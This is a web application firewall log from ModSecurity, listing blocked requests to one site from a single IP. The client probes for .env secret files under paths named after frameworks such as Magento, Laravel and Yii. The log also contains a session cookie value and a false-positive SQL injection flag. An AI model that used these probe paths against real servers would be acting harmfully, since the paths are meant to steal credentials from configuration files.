[Mon May 11 16:33:34.932433 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/magento/.env"] [unique_id "agHovkWKUxpmnkK7zHx_VQAAAQs"]
[Mon May 11 16:33:34.932676 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/magento/.env"] [unique_id "agHovkWKUxpmnkK7zHx_VQAAAQs"]
[Mon May 11 16:33:35.090675 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /shopify/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/shopify/.env"] [unique_id "agHov0WKUxpmnkK7zHx_VgAAAQs"]
[Mon May 11 16:33:35.091083 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/shopify/.env"] [unique_id "agHov0WKUxpmnkK7zHx_VgAAAQs"]
[Mon May 11 16:33:35.091291 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/shopify/.env"] [unique_id "agHov0WKUxpmnkK7zHx_VgAAAQs"]
[Mon May 11 16:33:35.091536 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/shopify/.env"] [unique_id "agHov0WKUxpmnkK7zHx_VgAAAQs"]
[Mon May 11 16:33:35.247918 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /prestashop/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/prestashop/.env"] [unique_id "agHov0WKUxpmnkK7zHx_VwAAAQs"]
[Mon May 11 16:33:35.248308 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/prestashop/.env"] [unique_id "agHov0WKUxpmnkK7zHx_VwAAAQs"]
[Mon May 11 16:33:35.248493 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/prestashop/.env"] [unique_id "agHov0WKUxpmnkK7zHx_VwAAAQs"]
[Mon May 11 16:33:35.248719 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/prestashop/.env"] [unique_id "agHov0WKUxpmnkK7zHx_VwAAAQs"]
[Mon May 11 16:33:35.405739 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /codeigniter/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/codeigniter/.env"] [unique_id "agHov0WKUxpmnkK7zHx_WQAAAQs"]
[Mon May 11 16:33:35.406115 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/codeigniter/.env"] [unique_id "agHov0WKUxpmnkK7zHx_WQAAAQs"]
[Mon May 11 16:33:35.406317 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/codeigniter/.env"] [unique_id "agHov0WKUxpmnkK7zHx_WQAAAQs"]
[Mon May 11 16:33:35.406540 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/codeigniter/.env"] [unique_id "agHov0WKUxpmnkK7zHx_WQAAAQs"]
[Mon May 11 16:33:35.563132 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /cakephp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/cakephp/.env"] [unique_id "agHov0WKUxpmnkK7zHx_WgAAAQs"]
[Mon May 11 16:33:35.563526 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/cakephp/.env"] [unique_id "agHov0WKUxpmnkK7zHx_WgAAAQs"]
[Mon May 11 16:33:35.563715 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/cakephp/.env"] [unique_id "agHov0WKUxpmnkK7zHx_WgAAAQs"]
[Mon May 11 16:33:35.563949 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/cakephp/.env"] [unique_id "agHov0WKUxpmnkK7zHx_WgAAAQs"]
[Mon May 11 16:33:35.720286 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /zend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/zend/.env"] [unique_id "agHov0WKUxpmnkK7zHx_WwAAAQs"]
[Mon May 11 16:33:35.720662 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/zend/.env"] [unique_id "agHov0WKUxpmnkK7zHx_WwAAAQs"]
[Mon May 11 16:33:35.720855 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/zend/.env"] [unique_id "agHov0WKUxpmnkK7zHx_WwAAAQs"]
[Mon May 11 16:33:35.721088 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/zend/.env"] [unique_id "agHov0WKUxpmnkK7zHx_WwAAAQs"]
[Mon May 11 16:33:35.877114 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /yii/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/yii/.env"] [unique_id "agHov0WKUxpmnkK7zHx_XAAAAQs"]
[Mon May 11 16:33:35.877524 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/yii/.env"] [unique_id "agHov0WKUxpmnkK7zHx_XAAAAQs"]
[Mon May 11 16:33:35.877715 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/yii/.env"] [unique_id "agHov0WKUxpmnkK7zHx_XAAAAQs"]
[Mon May 11 16:33:35.877953 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/yii/.env"] [unique_id "agHov0WKUxpmnkK7zHx_XAAAAQs"]
[Mon May 11 16:33:36.034111 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel5/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/laravel5/.env"] [unique_id "agHowEWKUxpmnkK7zHx_XQAAAQs"]
[Mon May 11 16:33:36.034513 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/laravel5/.env"] [unique_id "agHowEWKUxpmnkK7zHx_XQAAAQs"]
[Mon May 11 16:33:36.034704 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/laravel5/.env"] [unique_id "agHowEWKUxpmnkK7zHx_XQAAAQs"]
[Mon May 11 16:33:36.034931 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/laravel5/.env"] [unique_id "agHowEWKUxpmnkK7zHx_XQAAAQs"]
[Mon May 11 16:33:36.193685 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v1/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/v1/.env"] [unique_id "agHowEWKUxpmnkK7zHx_XgAAAQs"]
[Mon May 11 16:33:36.194055 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/v1/.env"] [unique_id "agHowEWKUxpmnkK7zHx_XgAAAQs"]
[Mon May 11 16:33:36.194251 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "la-grande-fabrique.com"] [uri "/v1/.env"] [unique_id "agHowEWKUxpmnkK7zHx_XgAAAQs"]
[Mon May 11 16:33:36.194493 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=5,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "la-grande-fabrique.com"] [uri "/v1/.env"] [unique_id "agHowEWKUxpmnkK7zHx_XgAAAQs"]
[Mon May 11 16:33:36.350649 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /v2/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "la-grande-fabrique.com"] [uri "/v2/.env"] [unique_id "agHowEWKUxpmnkK7zHx_XwAAAQs"]
[Mon May 11 16:33:36.351033 2026] [security2:error] [pid 1411055:tid 1411068] [client 35.88.116.41:37302] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:_wp_session: de12a82ac83c81fe3ccbb9582d3bcb3e||1778511801||1778511441"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "la-grande-fabrique.com"] [uri "/v2/.env"] [unique_id "agHowEWKUxpmnkK7zHx_XwAAAQs"]
